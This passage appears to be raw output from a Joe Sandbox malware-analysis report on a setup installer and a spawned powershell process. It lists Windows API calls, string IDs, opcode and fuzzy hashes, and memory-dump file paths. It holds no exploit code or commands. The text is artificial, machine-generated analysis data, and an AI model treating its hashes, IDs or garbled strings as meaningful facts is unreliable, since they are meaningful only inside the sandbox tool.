                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: lstrcatwsprintf
                                                                                                                                                                                                                                                                • String ID: %02x%c$...
                                                                                                                                                                                                                                                                • API String ID: 3065427908-1057055748
                                                                                                                                                                                                                                                                • Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                                                                                                                                                                                                                                • Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • OleInitialize.OLE32(00000000), ref: 00405057
                                                                                                                                                                                                                                                                  • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                                                                                                                                                                                                                • OleUninitialize.OLE32(00000404,00000000), ref: 004050A5
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                                                                                                                                                                                                • String ID: Section: "%s"$Skipping section: "%s"
                                                                                                                                                                                                                                                                • API String ID: 2266616436-4211696005
                                                                                                                                                                                                                                                                • Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                                                                                                                                                                                                                                • Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetDC.USER32(?), ref: 00402100
                                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                                                                                                                                                                                                  • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                                                                                                                                                                                • CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A
                                                                                                                                                                                                                                                                  • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1599320355-0
                                                                                                                                                                                                                                                                • Opcode ID: 65b4e2bc04cdfc761cbb664ad7f9fd0a470a6c6464aa2ef3bfae8e7c7ff5a66d
                                                                                                                                                                                                                                                                • Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 65b4e2bc04cdfc761cbb664ad7f9fd0a470a6c6464aa2ef3bfae8e7c7ff5a66d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                                                                                                                                                                                                                • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
                                                                                                                                                                                                                                                                • lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
                                                                                                                                                                                                                                                                • lstrcpynW.KERNEL32(?,?,?), ref: 00407261
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                                                                                                                                                                                                • String ID: Version
                                                                                                                                                                                                                                                                • API String ID: 512980652-315105994
                                                                                                                                                                                                                                                                • Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                                                                                                                                                                                                                                • Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
                                                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00403303
                                                                                                                                                                                                                                                                • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2102729457-0
                                                                                                                                                                                                                                                                • Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                                                                                                                                                                                                                                • Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 00406395
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 0040639E
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2883127279-0
                                                                                                                                                                                                                                                                • Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                                                                                                                                                                                                                                • Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                                                                                                                                                                                                • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: PrivateProfileStringlstrcmp
                                                                                                                                                                                                                                                                • String ID: !N~
                                                                                                                                                                                                                                                                • API String ID: 623250636-529124213
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00405C71
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • Error launching installer, xrefs: 00405C48
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                                                • String ID: Error launching installer
                                                                                                                                                                                                                                                                • API String ID: 3712363035-66219284
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                • wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                  • Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CloseHandlelstrlenwvsprintf
                                                                                                                                                                                                                                                                • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                                                                                                • API String ID: 3509786178-2769509956
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                                                                                                                                                                                                                • lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
                                                                                                                                                                                                                                                                • CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 190613189-0
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000011.00000002.2558900710.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_17_2_7090000_powershell.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: 4']q$4']q$4']q$4']q$4']q$4']q$tP]q$tP]q$$]q$$]q$$]q
                                                                                                                                                                                                                                                                • API String ID: 0-308583777
Memory Dump Source
• Source File: 00000011.00000002.2554785896.0000000004190000.00000040.00000800.00020000.00000000.sdmp, Offset: 04190000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_4190000_powershell.jbxd
Memory Dump Source
• Source File: 00000011.00000002.2558900710.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_7090000_powershell.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: c5de8d41019a4cab8bd7c47b88331ed5c698c846864a4bd415cac50b49691dd8
                                                                                                                                                                                                                                                                • Instruction ID: 24c8c85e0172166d099a334912cd4081e94b9c7750d8d3faa302ea1a4ee7d8a0
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c5de8d41019a4cab8bd7c47b88331ed5c698c846864a4bd415cac50b49691dd8
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D84124F1B1020B9FCF608F6886417BE7BE2AF81244F1882B9D4149F251E735CC61E7A1
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000011.00000002.2554785896.0000000004190000.00000040.00000800.00020000.00000000.sdmp, Offset: 04190000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_17_2_4190000_powershell.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 874f44b6cec6444f3ce963470e73e5c19d262209b38e5fedb8943b6054b83280
                                                                                                                                                                                                                                                                • Instruction ID: 7f1fbf93a4c6c5b97d89ed5c2417162e7f43cfe84c2efb25cb9bd44b2e9d32ba
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 874f44b6cec6444f3ce963470e73e5c19d262209b38e5fedb8943b6054b83280
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2E411774A005099FCB0ACF58C1D8AAAFBF1FF48710B158599D855AB364C732FD90CBA0
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000011.00000002.2554785896.0000000004190000.00000040.00000800.00020000.00000000.sdmp, Offset: 04190000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_17_2_4190000_powershell.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 603add62bbb6414a94207b95bb9f0c0592fd6fe4efc1faae34394f84a82ac577
                                                                                                                                                                                                                                                                • Instruction ID: ddb811c165345d7dca95657c83ceae4081f2761ebec756f43c990525156e98dc
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 603add62bbb6414a94207b95bb9f0c0592fd6fe4efc1faae34394f84a82ac577
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D5410674A005099FCB09CF98C5D8AAAFBF1FF48710B1185A9D915AB364C732FD90CBA0
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000011.00000002.2554785896.0000000004190000.00000040.00000800.00020000.00000000.sdmp, Offset: 04190000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_17_2_4190000_powershell.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: d59d260aacf9c1328b6c621739ab02f177eaff4ea9ddad764b44302b4e5b3a7c
                                                                                                                                                                                                                                                                • Instruction ID: ab08d56eeab874fcdc4bc63b4741afcd577964da3caa93e806bdb33cfa21b802
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d59d260aacf9c1328b6c621739ab02f177eaff4ea9ddad764b44302b4e5b3a7c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C23170B4A093859FCB02CF58C890A99BFF1FF4A300B1945DAD449DB362C335AD55CBA1
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000011.00000002.2554785896.0000000004190000.00000040.00000800.00020000.00000000.sdmp, Offset: 04190000, based on PE: false
Memory Dump Source
• Source File: 00000011.00000002.2554785896.0000000004190000.00000040.00000800.00020000.00000000.sdmp, Offset: 04190000, based on PE: false
Memory Dump Source
• Source File: 00000011.00000002.2554319514.00000000028CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 028CD000, based on PE: false
Strings
Memory Dump Source
• Source File: 00000011.00000002.2558900710.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
Similarity
• API ID:
• String ID: 4']q$4']q$tP]q$tP]q$$]q$$]q$$]q
• API String ID: 0-108373575
Similarity
• API ID:
• String ID: 4']q$4']q$4']q$4']q$$]q$$]q
• API String ID: 0-2669322367
Similarity
• API ID:
• String ID: $]q$$]q$$]q$$]q
• API String ID: 0-858218434